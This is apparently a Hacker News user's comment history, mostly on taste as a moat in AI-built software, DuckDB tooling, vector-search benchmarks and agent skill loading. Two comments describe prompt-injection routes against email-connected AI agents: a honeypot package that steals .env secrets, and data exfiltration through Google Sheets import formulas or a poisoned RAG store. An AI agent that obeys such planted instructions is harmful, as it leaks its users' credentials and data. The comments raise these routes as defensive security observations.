Hacker Newsnew | past | comments | ask | show | jobs | submit | cjonas's commentslogin

There's been a lot of discussion around in the future how "taste" will be the only differentiation / moat (recently watched a good video about the gen-ai music industry), as everything will be trivially easy to recreate. But your vision and how well you execution it... and the nuance involved in getting every minor detail correct is much harder (and something the LLM is exactly average at). I recently experienced this while vibing the duckdb vscode extension "I always wanted". Code is 100% LLM generated, but I think I probably have well over 1000 turns of conversation at this point to make every detail exactly as I want it.

Personally, it feels like taste only buys you time and taste is easy to copy.

I don't know where this leaves us, but it's going to be interesting/scary to live through what seems to be coming.


> Personally, it feels like taste only buys you time and taste is easy to copy.

Why is it easy to copy?

I too have written a tiny essay on this topic (https://emsh.cat/good-taste/) but I don't see how "taste" is easy to copy, at least I haven't been convinced by any of the arguments people chucked at me so far.


Because it's easier to clone someone else's "good taste" by just mimic'ing their formula / ripping of their exact implementation of a feature/ui. The gap between "first to get it right" and "everyone else catches up" could become non-existent in software. You'd need to continuously innovate (I think to some degree, this has always been the case, but it's the tempo that has changing).

> Why is it easy to copy? I think music trends would be one historical example of this? With software it's a bit more concrete (I'll just make my app function EXACTLY like yours does) and there is less protection from the law, unless you manage to weasel your way into a patent.


> Because it's easier to clone someone else's "good taste" by just mimic'ing their formula / ripping of their exact implementation of a feature/ui.

But then you've only copied one of their choices made by their good taste, not actually copied their taste. If a new situation arises, you won't be able to make the same choice as they would. Basically, it doesn't generalize.


> If a new situation arises, you won't be able to make the same choice as they would.

They won't be able to, but they won't need to either - they can just continue cribbing off the original person, or if they are unable to continue cribbing off the same person, they'll find someone else to crib off.

The point is, for all these people outsourcing their thinking, they will always have someone to crib off.


I get that, but you can just "pin" to someone else's taste and they can effectively never get ahead for more than a few minutes.

I think (and hope) this won't be as big a problem in the arts because "authenticity" matters to most people, but I for the software industry it feels very disruptive (assuming the models continue to improve and are accessible).


> Personally, it feels like taste only buys you time and taste is easy to copy.

No offense, but only someone without taste would say this ;)

Taste is not easy to copy. If that were true then there would be no bad major Hollywood movies in established genres; yet despite hundreds of millions of dollars spent on the formulaic superhero genre, we still get stinkers like Madame Web or Kraven the Hunter.

If you actually try looking at places where people show off their taste--scrolling through the latest songs on Soundcloud being a great source--you realize that people just pump out terrible stuff without realizing it's terrible. This was true pre-AI, and AI it hasn't made it any less true.

It's similar to the transition from live instruments to the DAW in the music world. The DAW eliminated all physical training requirements for making music, and opened up massive new worlds for the types of music that could be made. The end result was a handful of great things amidst a sea of garbage.


Just to be clear, I don't feel this is actually the case in world of music and art, at least as an individual consumer. I would argue the industry & economy rewards it though.

In software it feels different though. If you build an awesome app and want to charge for it, what stops me from just pointing "Claude Epic 2.5" at it and making a pixel perfect replica?


> If you build an awesome app and want to charge for it, what stops me from just pointing "Claude Epic 2.5" at it and making a pixel perfect replica?

It's the same argument people used to use against open sourcing your code for a SaaS: "If I can just clone the repository and run the service myself, why is there a hosted product?"

There is so much more going on though, from how you run something, to how you can react to changes and how you perpetually try to avoid the spaghetti ball from building, so improvements don't take longer and longer to implement and break other things.

Even if the original code is the same, two operators of that service can lead to two very different experiences, not to mention how the service will look like in a year.


I would say almost all of these companies do have part of their stack as private IP, but regardless that's a good point...

Hope your right! I imagine the truth will fall somewhere in between our difference in opinion


How do you define taste (rough is fine)?

An intuition for what people like.

Inherently subjective, but you can still approximate ‘more or less tasteful’ by how many people respond well to it.


I'd say it is quite opposite, a deep understanding of what you like and consequently understanding what will make a creation into exactly what you like. (Well I guess some people can create without understanding, just directly expressing their likes)

Since many of our likes are driven by our shared culture and physiology, many other people will appreciate such creation (even if they don't understand why exactly they like it). Others will appreciate depth of nuance and uniqueness of your creation.

Opposite to taste is approximated "good" average which is likeable but just never hits all the right notes, and at the same time already suffering from sameness fatigue.


It's subjective in the philosophical sense (the subject of the predication is involved with the judgment itself) but that doesn't mean it can't be "right" (and probably more importantly, "wrong").

Is there anyway to run the query -> report generation standalone in process? Like maybe just outputting the html (or using the React components in a project).

I was looking to add similar report generation to a vscode-extension I've been building[0]

[0](https://github.com/ChuckJonas/duckdb-vscode)


This "single pane" attack isn't really the thing you should be most worried about. Imagine the agent is also connected to run python or create a Google sheet. I send an email asking you to run a report using a honey pot package that as soon as it's imported scans your .env and file systems and posts it to my server. Or if it can run emails, I trick it into passing it into an =import_url in Google sheets (harder but still possible). Maybe this instruction doesn't have to come from the primary input surface where you likely have the strongest guardrails. I could ask you to visit a website, open a PDF or poison your rag database somehow in hopes to hit a weaker sub agent.

All these coding agents should support custom otel endpoints with full instrumentation (http, mcp, file system access, etc).

True. They actually do support basic OTel now, but it's mostly limited to high-level metrics like token usage and session counts. Until then, parsing the local files seem to be pretty much the only way to get real observability.

How does this compare to duckdbs vector capabilities (vss extension)?

Yes, nothing on that or sqlite-vec (both of which seem to be apples to apples comparisons).

https://zvec.org/en/docs/benchmarks/


I maintain a fork of sqlite-vec (because there hasn't been activity on the main repo for more than a year): sqlite-vec is great for smaller dimensionality or smaller cardinality datasets, but know that it's brute-force, and query latency scales exactly linearly. You only avoid full table scans if you add filterable columns to your vec0 table and include them in your WHERE clause. There's no probabilistic lookup algorithm in sqlite-vec.

You're absolutely right—sqlite-vec currently only supports brute-force search, and its latency does scale linearly with dataset size. We did some rough comparisons using its benchmark tools: on the SIFT dataset, latency was around 100ms; on GIST, it was closer to 1000ms. In contrast, with zvec's HNSW implementation, we get ~1ms latency on SIFT and ~3ms on GIST, while achieving recall@100 of 99.9% on SIFT and 97.7% on GIST.

FWIW "You're absolutely right" broadly declares "a human is not piloting the keyboard"

You're right that we didn't include sqlite-vec in our initial benchmarks—apples-to-apples comparisons are always better. I've actually added basic zvec tests to my fork of sqlite-vec (https://github.com/luoxiaojian/sqlite-vec), so feel free to give it a try. We'll also be publishing a more complete performance comparison in an upcoming blog post—stay tuned!

All these libraries are to trying to do too much. The "batteries included" approach makes for great demos, but falls apart for any real application

I'm curious what would make you say that? Because we haven't experienced this. We are being used a fortune 1000 fintech in production.

Any specific experience you had? or more specifics of where batteries included went to far?


I may just be a "doomer", but my current take is we have maybe 3-5 years of decent compensation left to "extract" from our profession. Being an AI "expert" will likely extend that range slightly, but at the cost of being one of the "traitors" that helps build your own replacement (but it will happen with or without you).

This looks really cool for schema migrations but how does it handle updates/inserts if you need to move actual data as part of the migration?


Implementation Notes:

- There is no reason you have to expose the skills through the file system. Just as easy to add tool-call to load a skill. Just put a skill ID in the instruction metadata. Or have a `discover_skills` tool if you want to keep skills out of the instructions all together.

- Another variation is to put a "skills selector" inference in front of your agent invocation. This inference would receive the current inquiry/transcript + the skills metadata and return a list of potentially relevant skills. Same concept as a tool selection, this can save context bandwidth when there are a large number of skills


> Or have a `discover_skills` tool

Yes, treating the "front matter" of skill as "function definition" of tool calls as kind of an equivalence class.

This understanding helped me create an LLM agnostic (also sandboxed) open-skills[1] way before this standardization was proposed.

1. Open-skills: https://github.com/instavm/open-skills


ya... the number of ways to infiltrate a malicious prompt and exfil data is overwhelming almost unlimited. Any tool that can hit a arbitrary url or make a dns request is basic an exfil path.

I recently did a test of a system that was triggering off email and had access to write to google sheets. Easy exfil via `IMPORTDATA`, but there's probably hundreds of ways to do it.


Guys, I think we just rediscovered fascism and social engineering. Lets make the torment nexus on the internet!


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: